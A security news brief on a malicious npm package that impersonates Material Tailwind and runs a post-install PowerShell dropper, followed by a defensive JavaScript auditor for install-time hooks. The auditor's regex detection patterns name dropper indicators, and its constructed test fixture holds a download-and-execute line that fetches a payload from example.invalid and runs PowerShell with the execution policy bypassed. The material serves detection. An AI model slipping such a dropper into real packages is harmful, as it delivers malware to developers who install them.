ReversingLabs researchers discovered that the legitimate Tailwind CSS component library Material Tailwind has been impersonated by a malicious npm package, indicating continued malware distribution efforts in open source software repositories, The Hacker News reports.
The report noted that the malicious npm package had been downloaded 320 times since Sept. 15.
"The malicious Material Tailwind npm package, while posing as a helpful development tool, has an automatic post-install script," said ReversingLabs researcher Karlo Zanki.
The post-install script downloads a ZIP archive from a remote server; the archive contains PowerShell code responsible for command-and-control communication, process manipulation, and persistence.
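The attack above relies on an npm lifecycle hook (preinstall, install or postinstall) that runs automatically during installation and hands control to a dropper script. The following is an added example, not code from ReversingLabs or from the Material Tailwind project: it audits an unpacked package for install-time hooks, follows the local script each hook invokes, and flags download-and-execute indicators. The package contents (example-impersonator, setup.js, the example.invalid URL) are constructed for illustration only.

```javascript
// Added example (not ReversingLabs' or the Material Tailwind project's code):
// audit an unpacked npm package for lifecycle hooks that run at install time
// and scan the scripts they invoke for download-and-execute indicators.
// All package contents below are constructed for illustration.

// Hooks npm runs automatically when a dependency is installed from the registry.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];

// Indicators typical of a dropper: PowerShell spawn, remote fetch, archive
// handling, child-process execution, encoded payloads.
const INDICATORS = [
  { id: "powershell", re: /powershell(\.exe)?/i },
  { id: "http-fetch", re: /https?:\/\/|Invoke-WebRequest|\bcurl\b|\bwget\b|https?\.get\(/i },
  { id: "archive", re: /\.zip\b|unzip|Expand-Archive|AdmZip/i },
  { id: "spawn", re: /child_process|exec\(|spawn\(|execSync\(/ },
  { id: "encoding", re: /base64|-EncodedCommand/i },
];

function indicatorsIn(text) {
  return INDICATORS.filter(({ re }) => re.test(text)).map(({ id }) => id);
}

// Extract local script files referenced by a hook command such as "node ./setup.js".
function referencedFiles(cmd) {
  const refs = [];
  for (const tok of cmd.split(/\s+/)) {
    const m = tok.match(/^\.?\/?([\w./-]+\.(?:js|cjs|mjs|sh|ps1))$/);
    if (m) refs.push(m[1].replace(/^\.\//, ""));
  }
  return refs;
}

// `files` maps a path inside the unpacked package to its text content.
function auditPackage(files) {
  const pkg = JSON.parse(files["package.json"]);
  const scripts = pkg.scripts || {};
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    if (!(hook in scripts)) continue;
    const cmd = scripts[hook];
    const hits = new Set(indicatorsIn(cmd));
    for (const path of referencedFiles(cmd)) {
      const body = files[path];
      // A hook pointing at a file absent from the tarball is itself suspicious.
      if (body === undefined) { hits.add("missing-file:" + path); continue; }
      indicatorsIn(body).forEach((h) => hits.add(h));
    }
    findings.push({ hook, cmd, indicators: [...hits] });
  }
  return {
    name: pkg.name,
    hasInstallHooks: findings.length > 0,
    suspicious: findings.some((f) => f.indicators.length > 0),
    findings,
  };
}

// Constructed sample: a postinstall hook whose script fetches a ZIP from a
// remote server and hands the extracted content to PowerShell.
const SUSPICIOUS_PKG = {
  "package.json": JSON.stringify({
    name: "example-impersonator",
    version: "0.0.1",
    scripts: { postinstall: "node ./setup.js" },
  }),
  "setup.js": [
    'const https = require("https");',
    'const { execSync } = require("child_process");',
    'https.get("https://example.invalid/payload.zip", (res) => {',
    "  // write the archive to disk, extract it, then run the dropped script",
    '  execSync("powershell.exe -ExecutionPolicy Bypass -File run.ps1");',
    "});",
  ].join("\n"),
};

// Constructed sample: a benign library with no install-time hooks.
const BENIGN_PKG = {
  "package.json": JSON.stringify({
    name: "example-lib",
    version: "1.0.0",
    scripts: { build: "tsc", test: "jest" },
  }),
};

console.log(JSON.stringify(auditPackage(SUSPICIOUS_PKG), null, 2));
console.log(JSON.stringify(auditPackage(BENIGN_PKG), null, 2));
```

The check is heuristic: a dropper can hide its indicators behind obfuscation, so a hit is a reason to read the script, not a verdict, and a clean result is not proof of safety. Independently of any scanner, setting `ignore-scripts=true` in `.npmrc` stops npm from running lifecycle hooks at all, which would have neutralised this particular delivery mechanism at the cost of having to run legitimate build hooks by hand.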
Such impersonation underscores the growing attack surface of the software supply chain. The U.S. government recently directed federal agencies, through OMB memorandum M-22-18, to use only software whose producers attest to following NIST's Secure Software Development Framework.
"Ensuring software integrity is key to protecting Federal systems from threats and vulnerabilities and reducing overall risk from cyberattacks," said the White House.